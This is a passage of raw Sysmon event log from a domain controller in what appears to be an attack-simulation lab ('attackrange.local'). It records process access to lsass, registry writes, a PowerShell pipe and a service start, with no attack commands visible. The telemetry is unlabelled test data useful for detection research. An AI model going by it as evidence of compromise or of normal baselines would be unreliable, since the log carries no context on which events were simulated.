09:20:16.402{5EBD8912-8CBD-6151-0B00-00000000FD01}6402736C:\Windows\system32\lsass.exe{5EBD8912-8CD0-6151-2900-00000000FD01}2172C:\Windows\System32\ismserv.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24be7|C:\Windows\system32\lsasrv.dll+25d2d|C:\Windows\system32\lsasrv.dll+24a65|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053036Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:16.402{5EBD8912-8CBD-6151-0B00-00000000FD01}6402736C:\Windows\system32\lsass.exe{5EBD8912-8CD0-6151-2900-00000000FD01}2172C:\Windows\System32\ismserv.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249ad|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 13241300x80000000000000001053035Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:20:16.402{5EBD8912-8CA0-6151-0100-00000000FD01}4SystemHKLM\System\CurrentControlSet\Services\EventLog\System\mrxsmb\ParameterMessageFile%%SystemRoot%%\System32\kernel32.dll 13241300x80000000000000001053034Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:20:16.402{5EBD8912-8CA0-6151-0100-00000000FD01}4SystemHKLM\System\CurrentControlSet\Services\EventLog\System\mrxsmb\ParameterMessageFile%%SystemRoot%%\System32\kernel32.dll 10341000x80000000000000001053033Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:16.402{5EBD8912-8CBD-6151-0500-00000000FD01}416532C:\Windows\system32\csrss.exe{5EBD8912-8CD0-6151-2D00-00000000FD01}2452C:\Windows\system32\dfssvc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001053032Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:16.385{5EBD8912-8CBD-6151-0A00-00000000FD01}624692C:\Windows\system32\services.exe{5EBD8912-8CD0-6151-2D00-00000000FD01}2452C:\Windows\system32\dfssvc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+307d|C:\Windows\system32\services.exe+6334|C:\Windows\system32\services.exe+dc24|C:\Windows\system32\services.exe+d248|C:\Windows\system32\services.exe+220e1|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053031Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:16.385{5EBD8912-8CBD-6151-0A00-00000000FD01}6243020C:\Windows\system32\services.exe{5EBD8912-8CD0-6151-2C00-00000000FD01}2424C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001053030Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:16.378{5EBD8912-8CD0-6151-2D00-00000000FD01}2452C:\Windows\System32\dfssvc.exe10.0.14393.4583 (rs1_release.210730-1850)Windows NT Distributed File System ServiceMicrosoft® Windows® Operating SystemMicrosoft Corporationdfssvc.exeC:\Windows\system32\dfssvc.exeC:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-8CBD-6151-E703-000000000000}0x3e70SystemMD5=FC6D2FD94ECCD95AC666A31DE5254628,SHA256=D639C43DA28D49C05B8FCA3BF81575888F46089EC7146E367F64E2274741B8BA,IMPHASH=D38366C43D0F6223104A675303D8E8CB{5EBD8912-8CBD-6151-0A00-00000000FD01}624C:\Windows\System32\services.exeC:\Windows\system32\services.exe 10341000x80000000000000001053029Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:16.385{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2C00-00000000FD01}2424C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053028Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:16.385{5EBD8912-8CBD-6151-0A00-00000000FD01}6243020C:\Windows\system32\services.exe{5EBD8912-8CD0-6151-2700-00000000FD01}3032C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 17141700x80000000000000001053027Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-CreatePipe2021-09-27 09:20:16.385{5EBD8912-8CD0-6151-2500-00000000FD01}2936\PSHost.132772080162308675.2936.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 10341000x80000000000000001053026Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:16.369{5EBD8912-8CBD-6151-0500-00000000FD01}416532C:\Windows\system32\csrss.exe{5EBD8912-8CD0-6151-2C00-00000000FD01}2424C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001053025Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:16.369{5EBD8912-8CBD-6151-0A00-00000000FD01}6243012C:\Windows\system32\services.exe{5EBD8912-8CD0-6151-2C00-00000000FD01}2424C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+307d|C:\Windows\system32\services.exe+6334|C:\Windows\system32\services.exe+ddc1|C:\Windows\system32\services.exe+d248|C:\Windows\system32\services.exe+220e1|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053024Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:16.369{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CBD-6151-0B00-00000000FD01}640C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053023Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:16.369{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CBD-6151-0B00-00000000FD01}640C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053022Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:16.369{5EBD8912-8CBD-6151-0B00-00000000FD01}6402736C:\Windows\system32\lsass.exe{5EBD8912-8CBD-6151-0A00-00000000FD01}624C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+1a16d|C:\Windows\system32\lsasrv.dll+2704b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053021Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:16.369{5EBD8912-8CBD-6151-0B00-00000000FD01}6402908C:\Windows\system32\lsass.exe{5EBD8912-8CBD-6151-0A00-00000000FD01}624C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+10d7e|C:\Windows\system32\lsasrv.dll+1d1c8|C:\Windows\system32\lsasrv.dll+1c3f1|C:\Windows\system32\lsasrv.dll+1ac10|C:\Windows\system32\lsasrv.dll+2704b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053020Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:16.354{5EBD8912-8CBD-6151-0B00-00000000FD01}6402736C:\Windows\system32\lsass.exe{5EBD8912-8CBD-6151-0A00-00000000FD01}624C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+10d7e|C:\Windows\system32\lsasrv.dll+1d1c8|C:\Windows\system32\lsasrv.dll+1c3f1|C:\Windows\system32\lsasrv.dll+1ac10|C:\Windows\system32\lsasrv.dll+2704b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053019Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:16.354{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CBD-6151-0B00-00000000FD01}640C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053018Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:16.354{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CBD-6151-0B00-00000000FD01}640C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053017Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:16.354{5EBD8912-8CBD-6151-0A00-00000000FD01}6243020C:\Windows\system32\services.exe{5EBD8912-8CD0-6151-2900-00000000FD01}2172C:\Windows\System32\ismserv.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053016Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:16.354{5EBD8912-8CBD-6151-0B00-00000000FD01}6402736C:\Windows\system32\lsass.exe{5EBD8912-8CBD-6151-0A00-00000000FD01}624C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+1a16d|C:\Windows\system32\lsasrv.dll+2704b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053015Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:16.354{5EBD8912-8CBD-6151-0B00-00000000FD01}6402736C:\Windows\system32\lsass.exe{5EBD8912-8CBD-6151-0A00-00000000FD01}624C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+10d7e|C:\Windows\system32\lsasrv.dll+1d1c8|C:\Windows\system32\lsasrv.dll+1c3f1|C:\Windows\system32\lsasrv.dll+1ac10|C:\Windows\system32\lsasrv.dll+2704b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053014Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:16.354{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CBD-6151-0B00-00000000FD01}640C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053013Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:16.354{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CBD-6151-0B00-00000000FD01}640C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053012Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:16.354{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CBD-6151-0B00-00000000FD01}640C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053011Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:16.354{5EBD8912-8CBD-6151-0B00-00000000FD01}6402736C:\Windows\system32\lsass.exe{5EBD8912-8CBD-6151-0A00-00000000FD01}624C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+1a16d|C:\Windows\system32\lsasrv.dll+2704b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053010Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:16.354{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CBD-6151-0B00-00000000FD01}640C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053009Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 